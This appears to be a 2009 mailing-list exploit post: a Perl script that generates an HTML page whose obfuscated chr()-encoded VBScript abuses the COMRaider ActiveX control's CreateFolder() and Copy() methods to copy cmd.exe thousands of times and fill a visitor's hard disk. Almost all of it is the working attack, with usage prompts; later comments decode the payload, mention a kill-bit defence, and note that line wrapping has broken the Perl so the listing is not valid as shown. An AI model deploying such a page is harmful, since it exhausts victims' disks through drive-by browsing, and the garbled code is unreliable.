COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit) Jul 17 2009 02:22PM
irancrash gmail com
#!/usr/bin/perl

###############################################################

# COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit)

#

# Discovered and Exploited by : Khashayar Fereidani

# Http://IRCRASH.com & Http://Fereidani.ir

#

###############################################################

# Help :

# perl comraider.pl

# Please enter the foldername (C:\ircrash\ for example) : C:\ircrash
# Please enter number of copy cmd to folder (10000 or more for example) : 10000

# ** Ok comraider.html created , now you can use this

###############################################################

# Tnx : Only for God

###############################################################

# Path of the file the generated page will copy repeatedly. It is pasted
# verbatim into a VBScript string literal in $shellcode below.
$cmd = 'C:\WINDOWS\system32\cmd.exe';

# Interactive inputs. Neither value is validated: $folder is inserted into
# the VBScript unescaped (a '"' inside it would end the string literal
# early) and $number is never checked to be an integer.
print 'Please enter the foldername (C:\ircrash\ for example) : ';

$folder = <stdin>;

print "Please enter number of copy cmd to folder (10000 or more for example) : ";

$number = <stdin>;

chomp $number;

chomp $folder;

# The payload is an HTML page built as a chr() chain; every byte is plain
# ASCII. Decoded it: embeds an <object> with classid
# clsid:9A077D0D-B4A6-4EC0-B6CF-98526DF589E4 (id 'target'), then a VBScript
# block that calls target.CreateFolder on $folder and loops $number times
# calling target.Copy with $cmd as source and $folder & n & ".exe" as the
# destination. Each iteration writes another copy, which is the disk-filling
# effect described in the header. From a defensive view the issue is an
# ActiveX control exposing file-system methods to page script; kill-bitting
# this CLSID or removing the control blocks the page from doing anything.
# NOTE: the mailing-list line wrapping below has split tokens (e.g. "ch" /
# "r(0x6E)", "$fold" / "er"), so the listing as transcribed here is not
# syntactically valid Perl.
$shellcode = chr(0x3C).chr(0x48).chr(0x54).chr(0x4D).chr(0x4C).chr(0x3E).chr(0xD).chr
(0xA).chr(0x3C).chr(0x21).chr(0x2D).chr(0x2D).chr(0xD).chr(0xA).chr(0x43
).chr(0x4F).chr(0x4D).chr(0x52).chr(0x61).chr(0x69).chr(0x64).chr(0x65).
chr(0x72).chr(0x20).chr(0x49).chr(0x64).chr(0x65).chr(0x66).chr(0x65).ch
r(0x6E).chr(0x73).chr(0x65).chr(0x20).chr(0x4C).chr(0x61).chr(0x62).chr(
0x73).chr(0x20).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x
65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x28
).chr(0x29).chr(0x20).chr(0x61).chr(0x6E).chr(0x64).chr(0x20).chr(0x43).
chr(0x6F).chr(0x70).chr(0x79).chr(0x28).chr(0x29).chr(0x20).chr(0x49).ch
r(0x6E).chr(0x73).chr(0x65).chr(0x63).chr(0x75).chr(0x72).chr(0x65).chr(
0x20).chr(0x4D).chr(0x65).chr(0x74).chr(0x68).chr(0x6F).chr(0x64).chr(0x
20).chr(0x45).chr(0x78).chr(0x70).chr(0x6C).chr(0x6F).chr(0x69).chr(0x74
).chr(0xD).chr(0xA).chr(0x44).chr(0x69).chr(0x73).chr(0x63).chr(0x6F).ch
r(0x76).chr(0x65).chr(0x72).chr(0x65).chr
(0x64).chr(0x20).chr(0x62).chr(0x79).chr(0x20).chr(0x3A).chr(0x20).chr(0
x4B).chr(0x68).chr(0x61).chr(0x73).chr(0x68).chr(0x61).chr(0x79).chr(0x6
1).chr(0x72).chr(0x20).chr(0x46).chr(0x65).chr(0x72).chr(0x65).chr(0x69)
.chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0xD).chr(0xA).chr(0x68).chr
(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x66).chr(0
x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x6
9).chr(0x2E).chr(0x69).chr(0x72).chr(0x20).chr(0x26).chr(0x20).chr(0x68)
.chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x69).c
hr(0x72).chr(0x63).chr(0x72).chr(0x61).chr(0x73).chr(0x68).chr(0x2E).chr
(0x63).chr(0x6F).chr(0x6D).chr(0xD).chr(0xA).chr(0x2D).chr(0x2D).chr(0x3
E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x6F).chr(0x62).chr
(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x20).chr(0x63).chr(0x6C).chr(0
x61).chr(0x73).chr(0x73).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x6
3).chr(0x6C).chr(0x73).chr(0x69).chr(0x64).chr(0x3A).
chr(0x39).chr(0x41).chr(0x30).chr(0x37).chr(0x37).chr(0x44).chr(0x30).ch
r(0x44).chr(0x2D).chr(0x42).chr(0x34).chr(0x41).chr(0x36).chr(0x2D).chr(
0x34).chr(0x45).chr(0x43).chr(0x30).chr(0x2D).chr(0x42).chr(0x36).chr(0x
43).chr(0x46).chr(0x2D).chr(0x39).chr(0x38).chr(0x35).chr(0x32).chr(0x36
).chr(0x44).chr(0x46).chr(0x35).chr(0x38).chr(0x39).chr(0x45).chr(0x34).
chr(0x27).chr(0x20).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x74).ch
r(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x27).chr(0x3E).chr(
0x3C).chr(0x2F).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x
74).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x73).ch
r(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x20).chr(0x6C).chr(
0x61).chr(0x6E).chr(0x67).chr(0x75).chr(0x61).chr(0x67).chr(0x65).chr(0x
3D).chr(0x27).chr(0x76).chr(0x62).chr(0x73).chr(0x63).chr(0x72).chr(0x69
).chr(0x70).chr(0x74).chr(0x27).chr(0x3E).chr(0xD).chr(0xA).chr(0x61).ch
r(0x72).chr(0x67).chr(0x66).chr(0x3D).chr(0x22).$fold
er.chr(0x22).chr(0xD).chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).c
hr(0x65).chr(0x74).chr(0x2E).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr
(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0
x72).chr(0x20).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0xD).chr(0xA)
.chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).c
hr(0x20).chr(0x3D).chr(0x20).chr(0x30).chr(0xD).chr(0xA).chr(0x6E).chr(0
x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x20).chr(0x3
D).chr(0x20).$number.chr(0xD).chr(0xA).chr(0x77).chr(0x68).chr(0x69).chr
(0x6C).chr(0x65).chr(0x20).chr(0x28).chr(0x6E).chr(0x75).chr(0x6D).chr(0
x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3C).chr(0x20).chr(0x6
E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x29)
.chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr
(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x6E).chr(0x75).chr(0
x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20
).chr(0x2B).chr(0x20).chr(0x31).chr(0xD).chr(0xA).chr(0x61).chr(0x72).ch
r(0x67).chr(0x31).chr(0x3D).chr(0x22).$cmd.chr(0x22).chr(0xD).chr(0xA).c
hr(0x61).chr(0x72).chr(0x67).chr(0x32).chr(0x3D).chr(0x61).chr(0x72).chr
(0x67).chr(0x66).chr(0x20).chr(0x26).chr(0x20).chr(0x6E).chr(0x75).chr(0
x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x26).chr(0x2
0).chr(0x22).chr(0x2E).chr(0x65).chr(0x78).chr(0x65).chr(0x22).chr(0xD).
chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr
(0x2E).chr(0x43).chr(0x6F).chr(0x70).chr(0x79).chr(0x20).chr(0x61).chr(0
x72).chr(0x67).chr(0x31).chr(0x20).chr(0x2C).chr(0x61).chr(0x72).chr(0x6
7).chr(0x32).chr(0xD).chr(0xA).chr(0x77).chr(0x65).chr(0x6E).chr(0x64).c
hr(0xD).chr(0xA).chr(0x3C).chr(0x2F).chr(0x73).chr(0x63).chr(0x72).chr(0
x69).chr(0x70).chr(0x74).chr(0x3E);

# Success is reported before the file is even opened. The open below is
# two-argument, unchecked and in append mode ('>>'): a failed open goes
# unnoticed, and a second run appends a second copy of the page to the same
# file. The bareword handle is never closed, so flushing is left to exit.
print "** OK comraider.html created , now you can use this";

open(myfile,'>>comraider.html');

print myfile $shellcode;
